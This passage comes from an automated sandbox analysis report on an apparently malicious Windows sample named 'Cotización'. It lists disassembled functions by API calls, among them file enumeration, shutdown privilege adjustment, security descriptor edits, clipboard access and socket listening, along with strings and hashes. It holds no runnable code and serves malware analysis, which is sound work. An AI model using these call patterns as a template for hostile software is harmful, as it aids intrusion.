                • CloseDesktop.USER32(?), ref: 0044657A
                • SetProcessWindowStation.USER32(?), ref: 00446588
                • CloseHandle.KERNEL32(?), ref: 00446592
                • DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_wcslen_wcsncpy
                • String ID: $@OH$default$winsta0
                • API String ID: 3324942560-3791954436
                • Opcode ID: 4d1d68c1aea3dabcf030405aafb24e1344eb51be90ba82aa3e7b9bd6ceeac822
                • Instruction ID: a255b9755a473e3b45922b0ee48cea4cb67e1360e8ecd59b8ab49ad27cdc7b44
                • Opcode Fuzzy Hash: 4d1d68c1aea3dabcf030405aafb24e1344eb51be90ba82aa3e7b9bd6ceeac822
                • Instruction Fuzzy Hash: A28180B0A00209ABEF10CFA5DD4AFAF77B8AF49704F05455EF914A7284D778D901CB69
                APIs
                • FindFirstFileW.KERNEL32(00000000,?,?), ref: 004788E4
                • FindClose.KERNEL32(00000000), ref: 00478924
                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478949
                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478961
                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00478989
                • __swprintf.LIBCMT ref: 004789D3
                • __swprintf.LIBCMT ref: 00478A1D
                • __swprintf.LIBCMT ref: 00478A4B
                • __swprintf.LIBCMT ref: 00478A79
                  • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 00413314
                  • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 0041332C
                • __swprintf.LIBCMT ref: 00478AA7
                • __swprintf.LIBCMT ref: 00478AD5
                • __swprintf.LIBCMT ref: 00478B03
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem
                • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                • API String ID: 999945258-2428617273
                • Opcode ID: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                • Instruction ID: 8fd0730747e081185947bc4026d2fd3d0a29cbe563c255e8678d3cf3417a7967
                • Opcode Fuzzy Hash: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                • Instruction Fuzzy Hash: 32719772204300ABC310EF55CC85FAFB7E9AF88705F504D2FF645962D1E6B9E944875A
                APIs
                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                • __wsplitpath.LIBCMT ref: 00403492
                  • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                • _wcscpy.LIBCMT ref: 004034A7
                • _wcscat.LIBCMT ref: 004034BC
                • SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                  • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                  • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
                  • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
                • _wcscpy.LIBCMT ref: 004035A0
                • _wcslen.LIBCMT ref: 00403623
                • _wcslen.LIBCMT ref: 0040367D
                Strings
                • _, xrefs: 0040371C
                • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
                • Error opening the file, xrefs: 00428231
                • Unterminated string, xrefs: 00428348
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                • API String ID: 3393021363-188983378
                • Opcode ID: 8f97009b1bf37824170bfd28a55259835aaf6cf29f8ea0c932b2b617a2771f3f
                • Instruction ID: 51a390cb75b153cc6cab8b26b712b327f6f81406d0e69f910df9a3585dc9283e
                • Opcode Fuzzy Hash: 8f97009b1bf37824170bfd28a55259835aaf6cf29f8ea0c932b2b617a2771f3f
                • Instruction Fuzzy Hash: CCD105B1508341AAD710EF64D841AEFBBE8AF85304F404C2FF98553291DB79DA49C7AB
                APIs
                • FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
                • GetFileAttributesW.KERNEL32(?), ref: 00431AE7
                • SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
                • FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
                • FindClose.KERNEL32(00000000), ref: 00431B20
                • FindClose.KERNEL32(00000000), ref: 00431B34
                • FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
                • SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
                • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
                • FindClose.KERNEL32(00000000), ref: 00431BCD
                • FindClose.KERNEL32(00000000), ref: 00431BDB
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                • String ID: *.*
                • API String ID: 1409584000-438819550
                • Opcode ID: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                • Instruction ID: b696eadadcb8a1627fc7fa6feda0e6e57aab690e04623b9265854ab7309d24dd
                • Opcode Fuzzy Hash: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                • Instruction Fuzzy Hash: CE41D8726002046BC700EF65DC45EAFB3ACAE89311F04592FF954C3190E7B8E519C7A9
                APIs
                • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
                • __swprintf.LIBCMT ref: 00431C2E
                • _wcslen.LIBCMT ref: 00431C3A
                • CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: CreateDirectoryFullNamePath__swprintf_wcslen
                • String ID: :$\$\??\%s
                • API String ID: 2192556992-3457252023
                • Opcode ID: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                • Instruction ID: 5b8928ca783b893dacbf0721098a8616f59dd17613a34138e213b27d6ec4c177
                • Opcode Fuzzy Hash: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                • Instruction Fuzzy Hash: EE413E726403186BD720DB54DC45FDFB3BCFF58710F00859AFA0896191EBB49A548BD8
                APIs
                • GetLocalTime.KERNEL32(?), ref: 004722A2
                • __swprintf.LIBCMT ref: 004722B9
                • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
                • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
                • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
                • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
                • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
                • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
                • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
                • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
                • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: FolderPath$LocalTime__swprintf
                • String ID: %.3d
                • API String ID: 3337348382-986655627
                • Opcode ID: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                • Instruction ID: 0d137f706e98bab13a4a4c7fcb7914b07bdb7c22a72ec07ab57cd4d47a51df83
                • Opcode Fuzzy Hash: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                • Instruction Fuzzy Hash: A6C1EC326101185BD710FBA1DD8AFEE7328EB44701F5045BFF909A60C2DBB99B598F64
                APIs
                • FindFirstFileW.KERNEL32(?,?), ref: 004428A8
                • FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
                • FindClose.KERNEL32(00000000), ref: 0044291C
                • FindClose.KERNEL32(00000000), ref: 00442930
                • FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
                • SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
                • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
                • FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
                • FindClose.KERNEL32(00000000), ref: 004429D4
                  • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
                • FindClose.KERNEL32(00000000), ref: 004429E2
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                • String ID: *.*
                • API String ID: 2640511053-438819550
                • Opcode ID: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                • Instruction ID: 696d482812dd8bff2d9106dd2d2144e175b5fe2258968c3fd44c1969776f6f9a
                • Opcode Fuzzy Hash: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                • Instruction Fuzzy Hash: AD410AB2A001186BDB10EBA5ED45FEF73689F89321F50465BFD0493280D6B8DE558BB8
                APIs
                • GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
                • OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
                • GetLastError.KERNEL32 ref: 00433414
                • ExitWindowsEx.USER32(?,00000000), ref: 00433437
                • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
                • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                • String ID: SeShutdownPrivilege
                • API String ID: 2938487562-3733053543
                • Opcode ID: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                • Instruction ID: ad32a9094aef850e2966724807b7d50af50c82f056daff98c21d8f44207777ad
                • Opcode Fuzzy Hash: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                • Instruction Fuzzy Hash: F221C971640205ABF7108FA4EC4EF7FB3ACE708702F144569FE09D51D1D6BA5D408765
                APIs
                  • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
                  • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
                  • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
                  • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
                • GetLengthSid.ADVAPI32(?), ref: 004461D0
                • GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
                • GetLengthSid.ADVAPI32(?), ref: 00446241
                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
                • CopySid.ADVAPI32(00000000), ref: 00446271
                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                • String ID:
                • API String ID: 1255039815-0
                • Opcode ID: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                • Instruction ID: cbecfdc94e872455e881353a2ef69e95113e06a92746e25f2a634f38edc45108
                • Opcode Fuzzy Hash: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                • Instruction Fuzzy Hash: C251BC71A00209BBEB10EFA1CD84EEFB778BF49704F01855EF515A7241D6B8DA05CB69
                APIs
                • __swprintf.LIBCMT ref: 00433073
                • __swprintf.LIBCMT ref: 00433085
                • __wcsicoll.LIBCMT ref: 00433092
                • FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
                • LoadResource.KERNEL32(?,00000000), ref: 004330BD
                • LockResource.KERNEL32(00000000), ref: 004330CA
                • FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
                • LoadResource.KERNEL32(?,00000000), ref: 00433105
                • SizeofResource.KERNEL32(?,00000000), ref: 00433114
                • LockResource.KERNEL32(?), ref: 00433120
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
                • String ID:
                • API String ID: 1158019794-0
                • Opcode ID: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                • Instruction ID: 48d2d5a3af9b637b7fc6f2c6b5a7fdd3517197a5f8dc2ef3994740021b7ed835
                • Opcode Fuzzy Hash: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                • Instruction Fuzzy Hash: C741F1322002146BDB10EF65EC84FAB37ADEB89321F00846BFD01C6245E779DA51C7A8
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                • String ID:
                • API String ID: 1737998785-0
                • Opcode ID: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                • Instruction ID: d84b136cee2c902db59abfe4f82a3f409d39725fe24efd6a62fd8a04edebb5dd
                • Opcode Fuzzy Hash: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                • Instruction Fuzzy Hash: 334114726001119FC310EFA5EC89B5EB7A4FF54315F00856EF909EB3A1EB75A941CB88
                APIs
                • SetErrorMode.KERNEL32(00000001), ref: 0045D627
                • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
                • GetLastError.KERNEL32 ref: 0045D6BF
                • SetErrorMode.KERNEL32(00000000,?), ref: 0045D751
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Error$Mode$DiskFreeLastSpace
                • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                • API String ID: 4194297153-14809454
                • Opcode ID: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                • Instruction ID: 1f300c266cb1daf6abeae651b696e439ee3a0372042695327ab67fb83666ce96
                • Opcode Fuzzy Hash: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                • Instruction Fuzzy Hash: FE418235D00209DFCB10EFA5C884A9DB7B4FF48315F10846BE905AB352D7799A85CB69
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: _memmove$_strncmp
                • String ID: @oH$\$^$h
                • API String ID: 2175499884-3701065813
                • Opcode ID: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                • Instruction ID: 796dcd1322dc9123c5f4e5533c800aedaabe8dca19c5b95ba0af32eff2573e22
                • Opcode Fuzzy Hash: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                • Instruction Fuzzy Hash: 4242E170E04249CFEB14CF69C8806AEBBF2FF85304F2481AAD856AB351D7399946CF55
                APIs
                • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0046530D
                • WSAGetLastError.WSOCK32(00000000), ref: 0046531C
                • bind.WSOCK32(00000000,?,00000010), ref: 00465356
                • WSAGetLastError.WSOCK32(00000000), ref: 00465363
                • closesocket.WSOCK32(00000000,00000000), ref: 00465377
                • listen.WSOCK32(00000000,00000005), ref: 00465381
                • WSAGetLastError.WSOCK32(00000000), ref: 004653A9
                • closesocket.WSOCK32(00000000,00000000), ref: 004653BD
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
